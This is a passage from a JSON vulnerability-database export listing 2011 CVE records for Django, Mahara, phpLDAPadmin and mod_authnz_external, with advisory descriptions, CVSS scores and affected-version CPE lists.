"cpe:2.3:a:mahara:mahara:1.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:mahara:mahara:1.2.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:rc2:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:38:35", "description": "The verify_exists functionality in the URLField implementation in Django before 1.2.7 and 1.3.x before 1.3.1 relies on Python libraries that attempt access to an arbitrary URL with no timeout, which allows remote attackers to cause a denial of service (resource consumption) via a URL associated with (1) a slow response, (2) a completed TCP connection with no application data sent, or (3) a large amount of application data, a related issue to CVE-2011-1521.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "cve", "title": "CVE-2011-4137", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1521", "CVE-2011-4137"], "modified": "2018-01-18T02:29:00", "cpe": ["cpe:/a:djangoproject:django:0.96", "cpe:/a:djangoproject:django:1.1.0", "cpe:/a:djangoproject:django:1.2", "cpe:/a:djangoproject:django:1.2.6", "cpe:/a:djangoproject:django:1.2.3", "cpe:/a:djangoproject:django:1.0.1", "cpe:/a:djangoproject:django:1.3", "cpe:/a:djangoproject:django:1.2.4", "cpe:/a:djangoproject:django:1.1", "cpe:/a:djangoproject:django:1.2.1", "cpe:/a:djangoproject:django:1.0.2", "cpe:/a:djangoproject:django:0.91", "cpe:/a:djangoproject:django:1.1.2", 
"cpe:/a:djangoproject:django:1.2.5", "cpe:/a:djangoproject:django:0.95.1", "cpe:/a:djangoproject:django:0.95", "cpe:/a:djangoproject:django:1.0", "cpe:/a:djangoproject:django:1.2.2", "cpe:/a:djangoproject:django:1.1.3"], "id": "CVE-2011-4137", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4137", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:djangoproject:django:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.91:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.96:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha1:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.3:*:*:*:*:*:*:*"]}], "ubuntucve": [{"lastseen": "2022-08-04T14:31:51", "description": "The get_dataroot_image_path function in lib/file.php in Mahara before 1.4.1\ndoes not properly validate uploaded image files, which allows remote\nattackers to cause a denial of service (memory consumption) via a (1) large\nor (2) invalid image.", "cvss3": {}, "published": "2011-11-15T00:00:00", "type": "ubuntucve", "title": "CVE-2011-2772", 
"bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2772"], "modified": "2011-11-15T00:00:00", "id": "UB:CVE-2011-2772", "href": "https://ubuntu.com/security/CVE-2011-2772", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:32:05", "description": "Django before 1.2.7 and 1.3.x before 1.3.1 uses a request's HTTP Host\nheader to construct a full URL in certain circumstances, which allows\nremote attackers to conduct cache poisoning attacks via a crafted request.", "cvss3": {}, "published": "2011-10-19T00:00:00", "type": "ubuntucve", "title": "CVE-2011-4139", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4139"], "modified": "2011-10-19T00:00:00", "id": "UB:CVE-2011-4139", "href": "https://ubuntu.com/security/CVE-2011-4139", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:32:05", "description": "The verify_exists functionality in the URLField implementation in Django\nbefore 1.2.7 and 1.3.x before 1.3.1 originally tests a URL's validity\nthrough a HEAD 
request, but then uses a GET request for the new target URL\nin the case of a redirect, which might allow remote attackers to trigger\narbitrary GET requests with an unintended source IP address via a crafted\nLocation header.", "cvss3": {}, "published": "2011-10-19T00:00:00", "type": "ubuntucve", "title": "CVE-2011-4138", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4138"], "modified": "2011-10-19T00:00:00", "id": "UB:CVE-2011-4138", "href": "https://ubuntu.com/security/CVE-2011-4138", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T14:31:57", "description": "Cross-site scripting (XSS) vulnerability in cmd.php in phpLDAPadmin 1.2.x\nbefore 1.2.2 allows remote attackers to inject arbitrary web script or HTML\nvia an _debug command.\n\n#### Bugs\n\n * <https://bugs.launchpad.net/ubuntu/precise/+source/phpldapadmin/+bug/887290>\n", "cvss3": {}, "published": "2011-11-02T00:00:00", "type": "ubuntucve", "title": "CVE-2011-4074", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4074"], "modified": 
"2011-11-02T00:00:00", "id": "UB:CVE-2011-4074", "href": "https://ubuntu.com/security/CVE-2011-4074", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:32:05", "description": "django.contrib.sessions in Django before 1.2.7 and 1.3.x before 1.3.1, when\nsession data is stored in the cache, uses the root namespace for both\nsession identifiers and application-data keys, which allows remote\nattackers to modify a session by triggering use of a key that is equal to\nthat session's identifier.", "cvss3": {}, "published": "2011-10-19T00:00:00", "type": "ubuntucve", "title": "CVE-2011-4136", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4136"], "modified": "2011-10-19T00:00:00", "id": "UB:CVE-2011-4136", "href": "https://ubuntu.com/security/CVE-2011-4136", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2022-08-04T14:31:57", "description": "The masort function in lib/functions.php in phpLDAPadmin 1.2.x before 1.2.2\nallows remote attackers to execute arbitrary PHP code via the orderby\nparameter (aka sortby variable) in a query_engine action to cmd.php, as\nexploited in the wild in October 2011.\n\n#### Bugs\n\n * [http://sourceforge.net/tracker/index.php?func=detail&aid=3417184&group_id=61828&atid=498546](<http://sourceforge.net/tracker/index.php?func=detail&aid=3417184&group_id=61828&atid=498546>)\n * <https://bugs.launchpad.net/ubuntu/precise/+source/phpldapadmin/+bug/887290>\n", "cvss3": {}, "published": 
"2011-11-02T00:00:00", "type": "ubuntucve", "title": "CVE-2011-4075", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4075"], "modified": "2011-11-02T00:00:00", "id": "UB:CVE-2011-4075", "href": "https://ubuntu.com/security/CVE-2011-4075", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:32:58", "description": "SQL injection vulnerability in mysql/mysql-auth.pl in the\nmod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server\nallows remote attackers to execute arbitrary SQL commands via the user\nfield.", "cvss3": {}, "published": "2011-07-28T00:00:00", "type": "ubuntucve", "title": "CVE-2011-2688", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2688"], "modified": "2011-07-28T00:00:00", "id": "UB:CVE-2011-2688", "href": "https://ubuntu.com/security/CVE-2011-2688", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:31:51", "description": "Multiple cross-site scripting (XSS) vulnerabilities in Mahara before 1.4.1\nallow remote 
attackers to inject arbitrary web script or HTML via vectors\nrelated to (1) URI attributes and (2) the External Feed component, as\ndemonstrated by the guid element in an RSS feed.", "cvss3": {}, "published": "2011-11-15T00:00:00", "type": "ubuntucve", "title": "CVE-2011-2771", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2771"], "modified": "2011-11-15T00:00:00", "id": "UB:CVE-2011-2771", "href": "https://ubuntu.com/security/CVE-2011-2771", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:31:50", "description": "Cross-site request forgery (CSRF) vulnerability in Mahara before 1.4.1\nallows remote attackers to hijack the authentication of administrators for\nrequests that add a user to an institution.", "cvss3": {}, "published": "2011-11-15T00:00:00", "type": "ubuntucve", "title": "CVE-2011-2773", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2773"], "modified": "2011-11-15T00:00:00", "id": "UB:CVE-2011-2773", "href": "https://ubuntu.com/security/CVE-2011-2773", "cvss": {"score": 
6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:32:05", "description": "The verify_exists functionality in the URLField implementation in Django\nbefore 1.2.7 and 1.3.x before 1.3.1 relies on Python libraries that attempt\naccess to an arbitrary URL with no timeout, which allows remote attackers\nto cause a denial of service (resource consumption) via a URL associated\nwith (1) a slow response, (2) a completed TCP connection with no\napplication data sent, or (3) a large amount of application data, a related\nissue to CVE-2011-1521.", "cvss3": {}, "published": "2011-10-19T00:00:00", "type": "ubuntucve", "title": "CVE-2011-4137", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1521", "CVE-2011-4137"], "modified": "2011-10-19T00:00:00", "id": "UB:CVE-2011-4137", "href": "https://ubuntu.com/security/CVE-2011-4137", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "debiancve": [{"lastseen": "2022-08-06T06:08:03", "description": "Django before 1.2.7 and 1.3.x before 1.3.1 uses a request's HTTP Host header to construct a full URL in certain circumstances, which allows remote attackers to conduct cache poisoning attacks via a crafted request.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "debiancve", "title": "CVE-2011-4139", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4139"], "modified": "2011-10-19T10:55:00", "id": "DEBIANCVE:CVE-2011-4139", "href": "https://security-tracker.debian.org/tracker/CVE-2011-4139", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-06T06:08:03", "description": "The verify_exists functionality in the URLField implementation in Django before 1.2.7 and 1.3.x before 1.3.1 originally tests a URL's validity through a HEAD request, but then uses a GET request for the new target URL in the case of a redirect, which might allow remote attackers to trigger arbitrary GET requests with an unintended source IP address via a crafted Location header.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "debiancve", "title": "CVE-2011-4138", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4138"], "modified": "2011-10-19T10:55:00", "id": "DEBIANCVE:CVE-2011-4138", "href": "https://security-tracker.debian.org/tracker/CVE-2011-4138", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-07-04T06:01:38", "description": "Cross-site scripting (XSS) vulnerability in cmd.php in phpLDAPadmin 1.2.x before 1.2.2 allows remote attackers to inject arbitrary web script or HTML via an _debug 
command.", "cvss3": {}, "published": "2011-11-02T17:55:00", "type": "debiancve", "title": "CVE-2011-4074", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4074"], "modified": "2011-11-02T17:55:00", "id": "DEBIANCVE:CVE-2011-4074", "href": "https://security-tracker.debian.org/tracker/CVE-2011-4074", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-06T06:08:03", "description": "The CSRF protection mechanism in Django through 1.2.7 and 1.3.x through 1.3.1 does not properly handle web-server configurations supporting arbitrary HTTP Host headers, which allows remote attackers to trigger unauthenticated forged requests via vectors involving a DNS CNAME record and a web page containing JavaScript code.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "debiancve", "title": "CVE-2011-4140", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4140"], "modified": "2011-10-19T10:55:00", "id": "DEBIANCVE:CVE-2011-4140", "href": "https://security-tracker.debian.org/tracker/CVE-2011-4140", "cvss": 
{"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-06T06:08:03", "description": "django.contrib.sessions in Django before 1.2.7 and 1.3.x before 1.3.1, when session data is stored in the cache, uses the root namespace for both session identifiers and application-data keys, which allows remote attackers to modify a session by triggering use of a key that is equal to that session's identifier.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "debiancve", "title": "CVE-2011-4136", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4136"], "modified": "2011-10-19T10:55:00", "id": "DEBIANCVE:CVE-2011-4136", "href": "https://security-tracker.debian.org/tracker/CVE-2011-4136", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2022-07-04T06:01:38", "description": "The masort function in lib/functions.php in phpLDAPadmin 1.2.x before 1.2.2 allows remote attackers to execute arbitrary PHP code via the orderby parameter (aka sortby variable) in a query_engine action to cmd.php, as exploited in the wild in October 2011.", "cvss3": {}, "published": "2011-11-02T17:55:00", "type": "debiancve", "title": "CVE-2011-4075", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, 
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4075"], "modified": "2011-11-02T17:55:00", "id": "DEBIANCVE:CVE-2011-4075", "href": "https://security-tracker.debian.org/tracker/CVE-2011-4075", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-04T06:00:07", "description": "SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.", "cvss3": {}, "published": "2011-07-28T18:55:00", "type": "debiancve", "title": "CVE-2011-2688", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2688"], "modified": "2011-07-28T18:55:00", "id": "DEBIANCVE:CVE-2011-2688", "href": "https://security-tracker.debian.org/tracker/CVE-2011-2688", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-06T06:08:03", "description": "The verify_exists functionality in the URLField implementation in Django before 1.2.7 and 1.3.x before 1.3.1 relies on Python libraries that attempt access to an arbitrary URL with no timeout, which allows remote attackers to cause a denial of service (resource consumption) via a URL associated with (1) a slow response, (2) a completed TCP connection with no application data sent, or (3) a large amount of application data, a related issue to 
CVE-2011-1521.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "debiancve", "title": "CVE-2011-4137", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1521", "CVE-2011-4137"], "modified": "2011-10-19T10:55:00", "id": "DEBIANCVE:CVE-2011-4137", "href": "https://security-tracker.debian.org/tracker/CVE-2011-4137", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "gitlab": [{"lastseen": "2022-06-09T23:10:08", "description": "The CSRF protection mechanism in Django through 1.2.7 and 1.3.x through 1.3.1 does not properly handle web-server configurations supporting arbitrary HTTP Host headers, which allows remote attackers to trigger unauthenticated forged requests via vectors involving a DNS CNAME record and a web page containing JavaScript code.", "cvss3": {}, "published": "2018-07-23T00:00:00", "type": "gitlab", "title": "Cross-Site Request Forgery ", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4140"], "modified": "2018-07-23T00:00:00", "id": "GITLAB-54E6DBECADBD0312F52CA4C8814A13A8", "href": 
"https://gitlab.com/api/v4/projects/12006272/repository/files/pypi%2FDjango%2FCVE-2011-4140.yml/raw", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T23:10:05", "description": "django.contrib.sessions in Django before 1.2.7 and 1.3.x before 1.3.1, when session data is stored in the cache, uses the root namespace for both session identifiers and application-data keys, which allows remote attackers to modify a session by triggering use of a key that is equal to that session's identifier.", "cvss3": {}, "published": "2018-07-23T00:00:00", "type": "gitlab", "title": "Improper Input Validation", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4136"], "modified": "2018-07-23T00:00:00", "id": "GITLAB-1F2A6444243200478C1558882DA19AE9", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/pypi%2FDjango%2FCVE-2011-4136.yml/raw", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2022-06-09T23:10:06", "description": "The verify_exists functionality in the URLField implementation in Django before 1.2.7 and 1.3.x before 1.3.1 relies on Python libraries that attempt access to an arbitrary URL with no timeout, which allows remote attackers to cause a denial of service a slow response, a large amount of application data, a related issue to CVE-2011-1521.", "cvss3": {}, "published": "2018-07-23T00:00:00", "type": "gitlab", "title": "Moderate severity vulnerability that affects django", "bulletinFamily": "software", "cvss2": 
{"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1521", "CVE-2011-4137"], "modified": "2018-07-23T00:00:00", "id": "GITLAB-F8870E91AA55D92266BA9DAF7EC7E29A", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/pypi%2FDjango%2FCVE-2011-4137.yml/raw", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "github": [{"lastseen": "2022-05-13T12:33:35", "description": "The CSRF protection mechanism in Django through 1.2.7 and 1.3.x through 1.3.1 does not properly handle web-server configurations supporting 